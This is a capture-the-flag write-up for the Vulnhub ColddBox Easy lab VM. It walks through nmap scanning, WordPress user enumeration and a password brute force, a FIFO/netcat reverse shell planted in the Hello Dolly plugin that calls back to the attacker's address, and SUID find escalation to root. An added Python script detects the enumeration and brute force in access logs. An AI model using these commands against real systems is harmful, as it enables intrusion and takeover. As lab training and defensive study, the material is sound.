Vulnhub lab: ColddBox Easy

Target VM download link:
Local Kali address: 192.168.157.144

Information gathering

First find the target's IP address, then its open ports. The sweep below uses -sP, the legacy spelling of -sn (host discovery only, no port scan):

nmap -sP 192.168.157.144/24
Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-07 20:52 CST
Nmap scan report for 192.168.157.2
Host is up (0.00060s latency).
Nmap scan report for 192.168.157.133
Host is up (0.0021s latency).
Nmap scan report for 192.168.157.144
Host is up (0.00019s latency).
Nmap done: 256 IP addresses (3 hosts up) scanned in 4.42 seconds

The target host is 192.168.157.133 (.144 is this Kali box). Next a full TCP port scan with service detection: -p- covers all 65535 ports, -A enables OS and version detection, default scripts and traceroute.

nmap -A 192.168.157.133 -p-
Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-07 20:53 CST
Nmap scan report for 192.168.157.133
Host is up (0.00066s latency).
Not shown: 65533 closed ports
PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-generator: WordPress 4.1.31
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: ColddBox | One more machine
4512/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 4e:bf:98:c0:9b:c5:36:80:8c:96:e8:96:95:65:97:3b (RSA)
|   256 88:17:f1:a8:44:f7:f8:06:2f:d3:4f:73:32:98:c7:c5 (ECDSA)
|_  256 f2:fc:6c:75:08:20:b1:b2:51:2d:94:d6:94:d7:51:4f (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

The target exposes ports 80 and 4512; 4512 is SSH (OpenSSH 7.2p2) moved off its default port.
Start with port 80.
The site runs WordPress (nmap's http-generator header already reports version 4.1.31), so query it with wpscan for details:

wpscan --url http://192.168.157.133

The scan shows a wp-login.php login page, so the next step is enumerating usernames with wpscan (its "Author Id Brute Forcing" method requests /?author=N for successive N and reads the author slug from the redirect):

wpscan --url http://192.168.157.133 -e u
[+] the cold in person
 | Found By: Rss Generator (Passive Detection)

[+] philip
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] c0ldd
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] hugo
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

That gives four names, but "the cold in person" is only a display name pulled from the RSS feed; the other three were confirmed through login error messages (WordPress at this version reveals whether the username or the password was wrong, which is what makes the enumeration reliable). I put those three into user.txt as a username wordlist and brute-forced the wp-login form with rockyou:

wpscan --url http://192.168.157.133 -U user.txt -P /usr/share/wordlists/rockyou.txt
[SUCCESS] - c0ldd / 9876543210

One credential pair cracked. That is enough to move on, so I did not keep going to see whether the other users' passwords could also be recovered.
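As an added example (not from the original post): the enumeration and brute-force traffic above leaves a distinctive trail in the web server's access log, which is what a defender would alert on. The script below parses constructed Apache combined-format lines (not a real capture from this box) and flags any client that sweeps /?author=N IDs or hammers wp-login.php with POSTs. It relies on stock WordPress answering a failed login with 200 and a successful one with a 302 redirect; the thresholds are arbitrary choices for the example.

```python
import re
from collections import defaultdict

# Apache combined/common log prefix: ip ident user [timestamp] "METHOD path proto" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) \S+'
)
AUTHOR_RE = re.compile(r"[?&]author=(\d+)")


def parse_line(line):
    """Parse one access-log line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    return rec


def analyse(lines, author_threshold=3, login_threshold=10):
    """Flag clients that enumerate author IDs or brute-force wp-login.php.

    Assumption (true for stock WordPress): a failed login POST to wp-login.php
    is answered with 200 (the form again), a successful one with a 302 redirect.
    Thresholds are arbitrary choices for this example."""
    author_ids = defaultdict(set)   # ip -> distinct ?author=N values requested
    failed = defaultdict(int)       # ip -> wp-login.php POSTs not answered with 302
    succeeded = defaultdict(int)    # ip -> wp-login.php POSTs answered with 302

    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue                # unparsable line: skip, never crash on log noise
        ip = rec["ip"]
        m = AUTHOR_RE.search(rec["path"])
        if rec["method"] == "GET" and m:
            author_ids[ip].add(int(m.group(1)))
        if rec["method"] == "POST" and rec["path"].split("?")[0] == "/wp-login.php":
            if rec["status"] == 302:
                succeeded[ip] += 1
            else:
                failed[ip] += 1

    findings = {}
    for ip in set(author_ids) | set(failed) | set(succeeded):
        f = {}
        if len(author_ids[ip]) >= author_threshold:
            f["author_enum"] = sorted(author_ids[ip])
        if failed[ip] >= login_threshold:
            f["login_bruteforce"] = failed[ip]
            # a 302 after a burst of failures means the brute force probably worked
            f["login_success_after_bruteforce"] = succeeded[ip] > 0
        if f:
            findings[ip] = f
    return findings


def constructed_log():
    """Constructed sample (not a real capture): an author-ID sweep from the Kali
    box, a burst of failed logins, one success, and benign traffic from another host."""
    kali = "192.168.157.144"
    lines = [
        f'{kali} - - [07/Dec/2020:20:55:{i:02d} +0800] "GET /?author={i} HTTP/1.1" '
        f'{301 if i <= 3 else 404} 0'
        for i in range(1, 6)
    ]
    lines += [
        f'{kali} - - [07/Dec/2020:20:56:{i:02d} +0800] "POST /wp-login.php HTTP/1.1" 200 3210'
        for i in range(12)
    ]
    lines.append(f'{kali} - - [07/Dec/2020:20:56:30 +0800] "POST /wp-login.php HTTP/1.1" 302 0')
    lines.append('192.168.157.2 - - [07/Dec/2020:21:00:00 +0800] "GET /?p=1 HTTP/1.1" 200 5000')
    lines.append('192.168.157.2 - - [07/Dec/2020:21:00:05 +0800] "POST /wp-login.php HTTP/1.1" 200 3210')
    lines.append("not a log line at all")
    return lines


if __name__ == "__main__":
    for ip, finding in analyse(constructed_log()).items():
        print(ip, finding)
```

The 302-after-failures flag is the one worth paging on: a single IP that walks author IDs, fails a dozen logins and then gets a redirect has almost certainly just logged in with a guessed password.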
Log in with that user.
Login succeeds, and luckily it is an administrator account.
Looking around, the interesting item is the Plugins tab.
Two plugins are installed. I use Hello Dolly (WordPress's bundled sample plugin) because it is the simplest: click Activate, then Edit. The editor shows plain PHP, and since an active plugin's file is included on every WordPress request, anything written into it runs server-side as the web server user. (Being able to edit plugin source from the dashboard is exactly what DISALLOW_FILE_EDIT in wp-config.php switches off.)

<?php
/*
Plugin Name: Hello Dolly
*/

function hello_dolly_get_lyric() {
	/** These are the lyrics to Hello Dolly */
	$lyrics = "Hello, Dolly
Well, hello, Dolly
It's so nice to have you back where you belong
You're lookin' swell, Dolly
I can tell, Dolly
You're still glowin', you're still crowin'
You're still goin' strong
We feel the room swayin'
While the band's playin'
One of your old favourite songs from way back when
So, take her wrap, fellas
Find her an empty lap, fellas
Dolly'll never go away again
Hello, Dolly
Well, hello, Dolly
It's so nice to have you back where you belong
You're lookin' swell, Dolly
I can tell, Dolly
You're still glowin', you're still crowin'
You're still goin' strong
We feel the room swayin'
While the band's playin'
One of your old favourite songs from way back when
Golly, gee, fellas
Find her a vacant knee, fellas
Dolly'll never go away
Dolly'll never go away
Dolly'll never go away again";

	// Here we split it into lines
	$lyrics = explode( "\n", $lyrics );

	// And then randomly choose a line
	return wptexturize( $lyrics[ mt_rand( 0, count( $lyrics ) - 1 ) ] );
}

// This just echoes the chosen line, we'll position it later
function hello_dolly() {
	$chosen = hello_dolly_get_lyric();
	echo "<p id='dolly'>$chosen</p>";
}

// Now we set that function up to execute when the admin_notices action is called
add_action( 'admin_notices', 'hello_dolly' );

// We need some CSS to position the paragraph
function dolly_css() {
	// This makes sure that the positioning is also good for right-to-left languages
	$x = is_rtl() ? 'left' : 'right';

	echo "
	<style type='text/css'>
	#dolly {
		float: $x;
		padding-$x: 15px;
		padding-top: 5px;		
		margin: 0;
		font-size: 11px;
	}
	</style>
	";
}

add_action( 'admin_head', 'dolly_css' );

?>

In short, this code splits $lyrics into an array on newlines, picks a random index, and echoes that line in the top-right corner of every admin page (hello_dolly is hooked to admin_notices and dolly_css positions the paragraph).

GET SHELL

Add a system() call to the plugin so it spawns a reverse shell back to Kali. First start a listener on the attacking machine with nc -lvnp 1234, then insert the following line into the plugin source (for example at the top of hello_dolly(), which runs on every wp-admin page load):

system("rm /tmp/bd;mkfifo /tmp/bd;cat /tmp/bd | /bin/bash -i 2>&1 | nc 192.168.157.144 1234 >/tmp/bd");

Save the file, then reload a wp-admin page until the listener gets a connection. The FIFO at /tmp/bd is what makes this work without nc -e: bash reads its commands from the FIFO, its output goes to nc, and whatever nc receives from Kali is written back into the FIFO. The PHP request hangs for as long as the shell is alive, so the browser page will not finish loading; that is expected.
Shell obtained, running as www-data (the Apache user).

Privilege escalation

sudo -l is not usable here, so I use find to look for other SUID binaries (-perm -u=s matches files with the setuid bit; stderr is discarded to hide the permission-denied noise):

find / -perm -u=s -type f 2>/dev/null

This turns up find itself with the SUID bit set. Head to /tmp and try it: find's -exec runs the given command with find's effective UID, which here is root.

www-data@ColddBox-Easy:/tmp$ touch test
touch test
www-data@ColddBox-Easy:/tmp$ find test -exec whoami \;
find test -exec whoami \;
root

Privilege escalation successful: the command runs as root, so the flag can be read the same way.

www-data@ColddBox-Easy:/tmp$ find test -exec cat /root/root.txt \;
find test -exec cat /root/root.txt \;
wqFGZWxpY2lkYWRlcywgbcOhcXVpbmEgY29tcGxldGFkYSE=


Summary

Fairly easy, but this box probably has several other routes, since a lot was left untouched: the SSH service on 4512, the hidden folder under the web root...
One more thing about the find escalation: swapping whoami for /bin/bash did not give a root shell, and I did not know why at the time. The reason is that bash drops its effective UID back to the real UID when the two differ; starting it with its -p (privileged) option prevents that drop and keeps the euid of 0 that the SUID find passed on.
